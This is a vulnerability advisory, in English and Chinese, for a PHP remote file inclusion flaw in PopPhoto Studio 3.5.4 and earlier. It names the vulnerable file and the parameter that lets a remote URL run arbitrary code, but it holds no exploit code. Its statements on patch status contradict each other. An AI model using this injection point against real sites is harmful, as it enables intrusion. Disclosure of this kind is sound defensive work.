[原文]PHP remote file inclusion vulnerability in resources/includes/popp.config.loader.inc.php in PopSoft Digital PopPhoto Studio 3.5.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter (cfg['popphoto_base_path'] variable). NOTE: Pixaria has notified CVE that "PopPhoto is NOT a product of Pixaria. It was a product of PopSoft Digital and is only hosted by Pixaria as a courtesy... The vulnerability listed was patched by the previous vendor and all previous users have received this update."
[CNNVD]PopSoft Digital PopPhoto Studio popp.config.loader.inc.php PHP远程文件包含漏洞(CNNVD-200605-280)
PopSoft Digital PopPhoto Studio 3.5.4及之前版本的resources/includes/popp.config.loader.inc.php中存在PHP远程文件包含漏洞。远程攻击者可以借助 include_path参数(cfg['popphoto_base_path'] 变量)中的URL，执行任意PHP代码。 注意： Pixaria已通知CVE"PopPhoto并非Pixaria的产品。 它是PopSoft Digital的产品，只不过由Pixaria提供免费的主机服务...所述漏洞已经由以前的厂商打了补丁，所有的以前用户已经收到了该更新程序。"
PopPhoto contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to popp.config.loader.inc.php not properly sanitizing user input supplied to the cfg[popphoto_base_path] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.